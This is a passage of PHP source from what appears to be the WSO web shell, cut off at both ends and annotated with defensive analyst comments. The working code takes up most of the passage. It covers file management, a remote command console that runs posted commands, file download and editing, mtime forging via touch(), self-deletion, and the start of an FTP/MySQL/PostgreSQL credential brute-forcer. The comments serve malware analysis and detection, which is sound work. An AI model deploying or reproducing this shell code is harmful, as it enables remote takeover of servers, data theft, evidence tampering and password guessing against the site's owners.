551 if ($type == "dir") deleteDir($item);
552 else @unlink($item);
553 }
554 closedir($dh);
555 @rmdir($path);
556 }
557 if (is_array(@$_POST['f'])) foreach($_POST['f'] as $f) {
558 if ($f == '..') continue;
559 $f = urldecode($f);
560 if (is_dir($f)) deleteDir($f);
561 else @unlink($f);
562 }
563 break;
564 case 'paste':
565 if ($_COOKIE['act'] == 'copy') {
566 function copy_paste($c, $s, $d) {
567 if (is_dir($c.$s)) {
568 mkdir($d.$s);
569 $h = @opendir($c.$s);
570 while (($f = @readdir($h)) !== false)
571 if (($f != ".") and($f != "..")) copy_paste($c.$s.
572 '/', $f, $d.$s.
573 '/');
574 }
575 elseif(is_file($c.$s)) @copy($c.$s, $d.$s);
576 }
577 foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
578 }
579 elseif($_COOKIE['act'] == 'move') {
580 function move_paste($c, $s, $d) {
581 if (is_dir($c.$s)) {
582 mkdir($d.$s);
583 $h = @opendir($c.$s);
584 while (($f = @readdir($h)) !== false)
585 if (($f != ".") and($f != "..")) copy_paste($c.$s.
586 '/', $f, $d.$s.
587 '/');
588 }
589 elseif(@is_file($c.$s)) @copy($c.$s, $d.$s);
590 }
591 foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
592 }
593 elseif($_COOKIE['act'] == 'zip') {
594 if (class_exists('ZipArchive')) {
595 $zip = new ZipArchive();
596 if ($zip - > open($_POST['p2'], 1)) {
597 chdir($_COOKIE['c']);
598 foreach($_COOKIE['f'] as $f) {
599 if ($f == '..') continue;
600 if (@is_file($_COOKIE['c'].$f)) $zip - > addFile($_COOKIE['c'].$f, $f);
601 elseif(@is_dir($_COOKIE['c'].$f)) {
602 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.
603 '/', FilesystemIterator::SKIP_DOTS));
604 foreach($iterator as $key => $value) {
605 $zip - > addFile(realpath($key), $key);
606 }
607 }
608 }
609 chdir($GLOBALS['cwd']);
610 $zip - > close();
611 }
612 }
613 }
614 elseif($_COOKIE['act'] == 'unzip') {
615 if (class_exists('ZipArchive')) {
616 $zip = new ZipArchive();
617 foreach($_COOKIE['f'] as $f) {
618 if ($zip - > open($_COOKIE['c'].$f)) {
619 $zip - > extractTo($GLOBALS['cwd']);
620 $zip - > close();
621 }
622 }
623 }
624 }
625 elseif($_COOKIE['act'] == 'tar') {
626 chdir($_COOKIE['c']);
627 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
628 wsoEx('tar cfzv '.escapeshellarg($_POST['p2']).
629 ' '.implode(' ', $_COOKIE['f']));
630 chdir($GLOBALS['cwd']);
631 }
632 unset($_COOKIE['f']);
633 setcookie('f', '', time() - 3600);
634 break;
635 default:
636 if (!empty($_POST['p1'])) {
637 WSOsetcookie('act', $_POST['p1']);
638 WSOsetcookie('f', serialize(@$_POST['f']));
639 WSOsetcookie('c', @$_POST['c']);
640 }
641 break;
642 }
643 }
644 wsoHeader();
645 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
646 $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
647 if ($dirContent === false) {
648 echo 'Can\'t open this folder!';
649 wsoFooter();
650 return;
651 }
652 global $sort;
653 $sort = array('name', 1);
654 if (!empty($_POST['p1'])) {
655 if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int) $match[2]);
656 }
657 echo "<script>
658
659 function sa() {
660 for (i = 0; i < d.files.elements.length; i++)
661 if (d.files.elements[i].type == 'checkbox')
662 d.files.elements[i].checked = d.files.elements[0].checked;
663 } < /script> < table width = '100%'
664 class = 'main'
665 cellspacing = '0'
666 cellpadding = '2' >
667 < form name = files method = post > < tr > < th width = '13px' > < input type = checkbox onclick = 'sa()'
668 class = chkbx > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a > < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a > < /th><th>Owner/Group < /th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a > < /th><th>Actions</th > < /tr>";
669 $dirs = $files = array();
670 $n = count($dirContent);
671 for ($i = 0; $i < $n; $i++) {
672 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
673 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
674 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
675 if (@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
676 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
677 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir'));
678 }
679 $GLOBALS['sort'] = $sort;
680
681 function wsoCmp($a, $b) {
682 if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
683 else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
684 }
685 usort($files, "wsoCmp");
686 usort($dirs, "wsoCmp");
687 $files = array_merge($dirs, $files);
688 $l = 0;
689 foreach($files as $f) {
690 echo '<tr'.($l ? ' class=l1' : '').
691 '><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).
692 '" class=chkbx></td><td><a href=# onclick="'.(($f['type'] == 'file') ? 'g(\'FilesTools\',null,\''.urlencode($f['name']).
693 '\', \'view\')">'.htmlspecialchars($f['name']) : 'g(\'FilesMan\',\''.$f['path'].
694 '\');" '.(empty($f['link']) ? '' : "title='{$f['link']}'").
695 '><b>[ '.htmlspecialchars($f['name']).
696 ' ]</b>').
697 '</a></td><td>'.(($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']).
698 '</td><td>'.$f['modify'].
699 '</td><td>'.$f['owner'].
700 '/'.$f['group'].
701 '</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
702 '\',\'chmod\')">'.$f['perms'].
703 '</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
704 '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
705 '\', \'touch\')">T</a>'.(($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
706 '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
707 '\', \'download\')">D</a>' : '').
708 '</td></tr>';
709 $l = $l ? 0 : 1;
710 }
711 echo "<tr><td colspan=7> < input type = hidden name = a value = 'FilesMan' >
712 < input type = hidden name = c value = '" . htmlspecialchars($GLOBALS['
713 cwd ']) . "' >
714 < input type = hidden name = charset value = '" . (isset($_POST['
715 charset ']) ? $_POST['
716 charset '] : '
717 ') . "' >
718 < select name = 'p1' > < option value = 'copy' > Copy < /option><option value='move'>Move</option > < option value = 'delete' > Delete < /option>";
719 if (class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
720 echo "<option value='tar'>Compress (tar.gz)</option>";
721 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>";
722 echo "</select> ";
723 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His").
724 ".".($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz').
725 "'> ";
726 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
727 wsoFooter();
728 }
729
// Analyst notes (defensive): this handler renders three operator panels — "String
// conversions", "Search files" and "Search for hash". All input is taken from $_POST
// (p1 = tool/function name, p2 = text, p3 = filename glob, c = start directory).
// Nothing here is cleaned up; the comments below only describe what the visible code does.
730 function actionStringTools() {
// Polyfills, declared at runtime only if the host PHP lacks the name. Note this hex2bin
// is NOT the PHP >= 5.4 builtin: it returns a string of binary digits, not raw bytes.
731 if (!function_exists('hex2bin')) {
732 function hex2bin($p) {
733 return decbin(hexdec($p));
734 }
735 }
736 if (!function_exists('binhex')) {
737 function binhex($p) {
738 return dechex(bindec($p));
739 }
740 }
741 if (!function_exists('hex2ascii')) {
742 function hex2ascii($p) {
743 $r = '';
744 for ($i = 0; $i < strLen($p); $i += 2) {
745 $r. = chr(hexdec($p[$i].$p[$i + 1]));
746 }
747 return $r;
748 }
749 }
750 if (!function_exists('ascii2hex')) {
751 function ascii2hex($p) {
752 $r = '';
753 for ($i = 0; $i < strlen($p); ++$i) $r. = sprintf('%02X', ord($p[$i]));
754 return strtoupper($r);
755 }
756 }
757 if (!function_exists('full_urlencode')) {
758 function full_urlencode($p) {
759 $r = '';
760 for ($i = 0; $i < strlen($p); ++$i) $r. = '%'.dechex(ord($p[$i]));
761 return strtoupper($r);
762 }
763 }
// Label => PHP function name. The function is later invoked by name from $_POST['p1'],
// guarded only by a (non-strict) in_array() against these values.
764 $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );
// AJAX mode: sets the md5(HTTP_HOST).'ajax' cookie, then returns a length-prefixed
// JavaScript fragment ("<decimal length>\n<js>") that writes into #strOutput.
// That response shape is a usable network signature for this family.
765 if (isset($_POST['ajax'])) {
766 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
767 'ajax', true);
768 ob_start();
769 if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']);
770 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "
771
772 \
773 ' ") . "';
774 ";
775 echo strlen($temp), "
776 ", $temp;
777 exit;
778 }
779 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
780 'ajax', 0);
// Non-AJAX page: wsoHeader()/wsoFooter() are defined elsewhere in the file.
781 wsoHeader();
782 echo '<h1>String conversions</h1><div class=content>';
783 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
784 foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v).
785 "'>".$k.
786 "</option>";
787 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).
788 'ajax'] ? 'checked' : '').
789 "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])).
790 "</textarea></form><pre class='ml1' style='".(empty($_POST['p1']) ? 'display:none;' : '').
791 "margin-top:5px' id='strOutput'>";
792 if (!empty($_POST['p1'])) {
793 if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
794 }
// The search form submits via g(); from the argument order here, p2 is presumably the
// text to look for and p3 the filename pattern — g() itself is not visible in this chunk.
795 echo "</pre></div><br><h1>Search files:</h1><div class=content> < form onsubmit = \"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> < tr > < td width = '1%' > Text: < /td><td><input type='text' name='text' style='width:100%'></td > < /tr> < tr > < td > Path: < /td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td > < /tr> < tr > < td > Name: < /td><td><input type='text' name='filename' value='*' style='width:100%'></td > < /tr> < tr > < td > < /td><td><input type='submit' value='>>'></td > < /tr> < /table></form > ";
796
// Nested, conditionally declared helper: recursively globs $path.$_POST['p3'] plus every
// subdirectory, and reads each matching file in full with file_get_contents() to test for
// the $_POST['p2'] substring. On a large tree this produces a burst of file reads by the
// web-server user — a useful host-side indicator. Being declared inside the action, a
// second call to actionStringTools() in one request would hit a redeclaration error.
797 function wsoRecursiveGlob($path) {
798 if (substr($path, -1) != '/') $path. = '/';
799 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.
800 '*', GLOB_ONLYDIR)));
801 if (is_array($paths) && @count($paths)) {
802 foreach($paths as $item) {
803 if (@is_dir($item)) {
804 if ($path != $item) wsoRecursiveGlob($item);
805 } else {
806 if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item).
807 "\", \"view\",\"\")'>".htmlspecialchars($item).
808 "</a><br>";
809 }
810 }
811 }
812 }
813 if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']);
// The hash form posts from the operator's browser to three external lookup sites
// (hashcracking.ru, md5.rednoize.com, crackfor.me); those hostnames are indicators to
// watch for in egress/proxy logs of the operator-side browser, not of the server.
814 echo "</div><br><h1>Search for hash:</h1><div class=content> < form method = 'post'
815 target = '_blank'
816 name = 'hf' >
817 < input type = 'text'
818 name = 'hash'
819 style = 'width:200px;' > < br >
820 < input type = 'hidden'
821 name = 'act'
822 value = 'find' / >
823 < input type = 'button'
824 value = 'hashcracking.ru'
825 onclick = \"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> < input type = 'button'
826 value = 'md5.rednoize.com'
827 onclick = \"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> < input type = 'button'
828 value = 'crackfor.me'
829 onclick = \"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br> < /form></div > ";
830 wsoFooter();
831 }
832
// Analyst notes (defensive): per-file operations on the path in $_POST['p1'].
// p2 selects the operation (download/mkfile/view/highlight/chmod/edit/hexdump/rename/touch,
// default 'view'), p3 carries the operation's argument. The path is used exactly as
// received — there is no containment check — so any file the web-server user can reach
// is in scope. The "edit" and "touch" branches rewrite timestamps (see below), which is
// the main thing a forensic timeline must account for.
833 function actionFilesTools() {
834 if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
// download: streams the file gzip-encoded with a Content-Disposition: attachment header
// whose filename is the basename of the requested path. Response headers of that shape
// from a script that normally serves HTML are a detection hook.
835 if (@$_POST['p2'] == 'download') {
836 if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
837 ob_start("ob_gzhandler", 4096);
838 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
839 if (function_exists("mime_content_type")) {
840 $type = @mime_content_type($_POST['p1']);
841 header("Content-Type: ".$type);
842 } else header("Content-Type: application/octet-stream");
843 $fp = @fopen($_POST['p1'], "r");
844 if ($fp) {
845 while (!@feof($fp)) echo @fread($fp, 1024);
846 fclose($fp);
847 }
848 }
849 exit;
850 }
// mkfile: creates an empty file, then falls through to the 'edit' view of it.
851 if (@$_POST['p2'] == 'mkfile') {
852 if (!file_exists($_POST['p1'])) {
853 $fp = @fopen($_POST['p1'], 'w');
854 if ($fp) {
855 $_POST['p2'] = "edit";
856 fclose($fp);
857 }
858 }
859 }
860 wsoHeader();
861 echo '<h1>File tools</h1><div class=content>';
862 if (!file_exists(@$_POST['p1'])) {
863 echo 'File not exists';
864 wsoFooter();
865 return;
866 }
// Owner/group resolution; falls back to numeric ids when posix_* is unavailable.
867 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
868 if (!$uid) {
869 $uid['name'] = @fileowner($_POST['p1']);
870 $gid['name'] = @filegroup($_POST['p1']);
871 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
// wsoViewSize() and wsoPermsColor() are defined elsewhere in the file.
872 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).
873 ' <span>Size:</span> '.(is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-').
874 ' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).
875 ' <span>Owner/Group:</span> '.$uid['name'].
876 '/'.$gid['name'].
877 '<br>';
878 echo '<span>Change time:</span> '.date('Y-m-d H:i:s', filectime($_POST['p1'])).
879 ' <span>Access time:</span> '.date('Y-m-d H:i:s', fileatime($_POST['p1'])).
880 ' <span>Modify time:</span> '.date('Y-m-d H:i:s', filemtime($_POST['p1'])).
881 '<br><br>';
882 if (empty($_POST['p2'])) $_POST['p2'] = 'view';
883 if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
884 else $m = array('Chmod', 'Rename', 'Touch');
885 foreach($m as $v) echo '<a href=# onclick="g(null,null,\''.urlencode($_POST['p1']).
886 '\',\''.strtolower($v).
887 '\')">'.((strtolower($v) == @$_POST['p2']) ? '<b>[ '.$v.
888 ' ]</b>' : $v).
889 '</a> ';
890 echo '<br><br>';
891 switch ($_POST['p2']) {
// view: raw contents, HTML-escaped, in 1 KiB reads.
892 case 'view':
893 echo '<pre class=ml1>';
894 $fp = @fopen($_POST['p1'], 'r');
895 if ($fp) {
896 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
897 @fclose($fp);
898 }
899 echo '</pre>';
900 break;
// highlight: PHP syntax highlighting via highlight_file(), span tags swapped for font tags.
901 case 'highlight':
902 if (@is_readable($_POST['p1'])) {
903 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
904 $code = @highlight_file($_POST['p1'], true);
905 echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code).
906 '</div>';
907 }
908 break;
// chmod: p3 is an octal digit string parsed by hand (digit * 8^position).
909 case 'chmod':
910 if (!empty($_POST['p3'])) {
911 $perms = 0;
912 for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) $perms += (int) $_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
913 if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
914 }
915 clearstatcache();
916 echo '<script>p3_="";</script><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
917 '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])), -4).
918 '"><input type=submit value=">>"></form>';
919 break;
// edit: p3 is the new content with one sentinel character prepended by the form
// ('1' + text, see the onsubmit below), stripped with substr(..., 1). After the write the
// original mtime is restored with touch(), so an mtime-based timeline will NOT show the
// modification; touch() cannot reset ctime, so the inode change time still records it.
920 case 'edit':
921 if (!is_writable($_POST['p1'])) {
922 echo 'File isn\'t writeable';
923 break;
924 }
925 if (!empty($_POST['p3'])) {
926 $time = @filemtime($_POST['p1']);
927 $_POST['p3'] = substr($_POST['p3'], 1);
928 $fp = @fopen($_POST['p1'], "w");
929 if ($fp) {
930 @fwrite($fp, $_POST['p3']);
931 @fclose($fp);
932 echo 'Saved!<br><script>p3_="";</script>';
933 @touch($_POST['p1'], $time, $time);
934 }
935 }
936 echo '<form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
937 '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
938 $fp = @fopen($_POST['p1'], 'r');
939 if ($fp) {
940 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
941 @fclose($fp);
942 }
943 echo '</textarea><input type=submit value=">>"></form>';
944 break;
// hexdump: whole file in memory; three columns (offset / hex / printable), 32 bytes per row.
// NUL, TAB, LF and CR are replaced by a space in the printable column.
945 case 'hexdump':
946 $c = @file_get_contents($_POST['p1']);
947 $n = 0;
948 $h = array('00000000<br>', '', '');
949 $len = strlen($c);
950 for ($i = 0; $i < $len; ++$i) {
951 $h[1]. = sprintf('%02X', ord($c[$i])).
952 ' ';
953 switch (ord($c[$i])) {
954 case 0:
955 $h[2]. = ' ';
956 break;
957 case 9:
958 $h[2]. = ' ';
959 break;
960 case 10:
961 $h[2]. = ' ';
962 break;
963 case 13:
964 $h[2]. = ' ';
965 break;
966 default:
967 $h[2]. = $c[$i];
968 break;
969 }
970 $n++;
971 if ($n == 32) {
972 $n = 0;
973 if ($i + 1 < $len) {
974 $h[0]. = sprintf('%08X', $i + 1).
975 '<br>';
976 }
977 $h[1]. = '<br>';
978 $h[2]. = "
979 ";
980 }
981 }
982 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].
983 '</pre></span></td><td bgcolor=#282828><pre>'.$h[1].
984 '</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).
985 '</pre></td></tr></table>';
986 break;
// rename: p3 is the new path; on success the page redirects (via g()) to the new name.
987 case 'rename':
988 if (!empty($_POST['p3'])) {
989 if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
990 else die('<script>g(null,null,"'.urlencode($_POST['p3']).
991 '",null,"")</script>');
992 }
993 echo '<form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
994 '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).
995 '"><input type=submit value=">>"></form>';
996 break;
// touch: sets atime and mtime to strtotime(p3) — explicit timestamp manipulation.
// Compare ctime (not settable here) against mtime when reconstructing a timeline.
997 case 'touch':
998 if (!empty($_POST['p3'])) {
999 $time = strtotime($_POST['p3']);
1000 if ($time) {
1001 if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
1002 else echo 'Touched!';
1003 } else echo 'Bad time format!';
1004 }
1005 clearstatcache();
1006 echo '<script>p3_="";</script><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
1007 '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).
1008 '"><input type=submit value=">>"></form>';
1009 break;
1010 }
1011 echo '</div>';
1012 wsoFooter();
1013 }
1014
// Analyst notes (defensive): interactive command panel. $_POST['p1'] is the command
// line, $_POST['p2'] the "redirect stderr" flag. Execution itself goes through wsoEx(),
// which is defined elsewhere in the file and not visible here. Two artefacts worth
// keying on: commands get a literal ' 2>&1' suffix appended server-side, and the
// process working directory of the PHP worker is changed when the command ends in
// "cd <dir>" (so later requests inherit that cwd).
1015 function actionConsole() {
1016 if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
1017 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1018 'stderr_to_out', true);
1019 $_POST['p1']. = ' 2>&1';
1020 }
1021 elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1022 'stderr_to_out', 0);
// AJAX mode: response is "<decimal length>\n" followed by JavaScript that clears the
// input box, appends "$ <cmd>\n<output>" (re-encoded from $_POST['charset'] to UTF-8 via
// iconv) to the output textarea, and optionally sets c_='<new cwd>'.
1023 if (isset($_POST['ajax'])) {
1024 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1025 'ajax', true);
1026 ob_start();
1027 echo "d.cf.cmd.value='';
1028 ";
1029 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
1030 $ " . $_POST['p1'] . "
1031 " . wsoEx($_POST['p1']), "
1032
1033 \
1034 ' "));
// Trailing "cd <dir>" (last ';'-separated segment) is applied to the PHP process itself.
1035 if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
1036 if (@chdir($match[1])) {
1037 $GLOBALS['cwd'] = @getcwd();
1038 echo "c_='".$GLOBALS['cwd'].
1039 "';";
1040 }
1041 }
1042 echo "d.cf.output.value+='".$temp.
1043 "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
1044 ", $temp;
1045 exit;
1046 }
// Full page: inline JS keeps an up/down-arrow command history (cmds/cur) in the browser.
1047 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1048 'ajax', 0); wsoHeader(); echo "<script>
1049 if (window.Event) window.captureEvents(Event.KEYDOWN);
1050 var cmds = new Array('');
1051 var cur = 0;
1052
1053 function kp(e) {
1054 var n = (window.Event) ? e.which : e.keyCode;
1055 if (n == 38) {
1056 cur--;
1057 if (cur >= 0)
1058 document.cf.cmd.value = cmds[cur];
1059 else
1060 cur++;
1061 } else if (n == 40) {
1062 cur++;
1063 if (cur < cmds.length)
1064 document.cf.cmd.value = cmds[cur];
1065 else
1066 cur--;
1067 }
1068 }
1069
1070 function add(cmd) {
1071 cmds.pop();
1072 cmds.push(cmd);
1073 cmds.push('');
1074 cur = cmds.length - 1;
1075 } < /script>";
// $GLOBALS['aliases'] (label => command, '' marks a group header) is populated elsewhere
// in the file; it feeds the <select name=alias> drop-down.
1076 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) {
1077 if ($v == '') {
1078 echo '<optgroup label="-'.htmlspecialchars($n).
1079 '-"></optgroup>';
1080 continue;
1081 }
1082 echo '<option value="'.htmlspecialchars($v).
1083 '">'.$n.
1084 '</option>';
1085 }
1086 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).
1087 'ajax'] ? 'checked' : '').
1088 '> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']).
1089 'stderr_to_out'] ? 'checked' : '').
1090 '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
// Non-AJAX path runs the command a second way: output is rendered inline, HTML-escaped.
1091 if (!empty($_POST['p1'])) {
1092 echo htmlspecialchars("$ ".$_POST['p1'].
1093 "
1094 " . wsoEx($_POST['p1']));
1095 }
1096 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1097 echo '</form></div><script>d.cf.cmd.focus();</script>';
1098 wsoFooter();
1099 }
1100
// Expires the session cookie (name = md5 of the Host header, value = the password hash,
// set during login) and terminates with the literal body 'bye!'. The cookie name pattern
// (32 hex chars, equal to md5(HTTP_HOST)) is a reliable indicator in web logs.
1101 function actionLogout() {
1102 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1103 die('bye!');
1104 }
1105
// Deletes the file the shell lives in when p1 == 'yes'. The preg_replace strips a
// "(<digits>) ..." suffix from __FILE__, i.e. the "(N) : eval()'d code" form __FILE__ takes
// when the shell was loaded through eval(); in that case the *hosting* file is unlinked.
// Forensically: after this runs the artefact is gone from disk; recover it from backups,
// the web server's access log (POST with p1=yes) or memory/inode carving.
1106 function actionSelfRemove() {
1107 if ($_POST['p1'] == 'yes')
1108 if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed');
1109 else echo 'unlink error!';
1110 if ($_POST['p1'] != 'yes') wsoHeader();
1111 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1112 wsoFooter();
1113 }
1114
// Analyst notes (defensive): credential-guessing panel against an FTP, MySQL or
// PostgreSQL service at $_POST['server'] ("host:port", form default 127.0.0.1).
// Detection: a burst of failed logins on those services originating from the web server
// host, one attempt per /etc/passwd entry (type 1) or per line of a wordlist (type 2).
// The MySQL variant uses the mysql_* extension, which no longer exists in PHP 7+.
1115 function actionBruteforce() {
1116 wsoHeader();
1117 if (isset($_POST['proto'])) {
1118 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).
1119 ' <span>Server:</span> '.htmlspecialchars($_POST['server']).
1120 '<br>';
// One wsoBruteForce() definition is declared at runtime depending on the protocol;
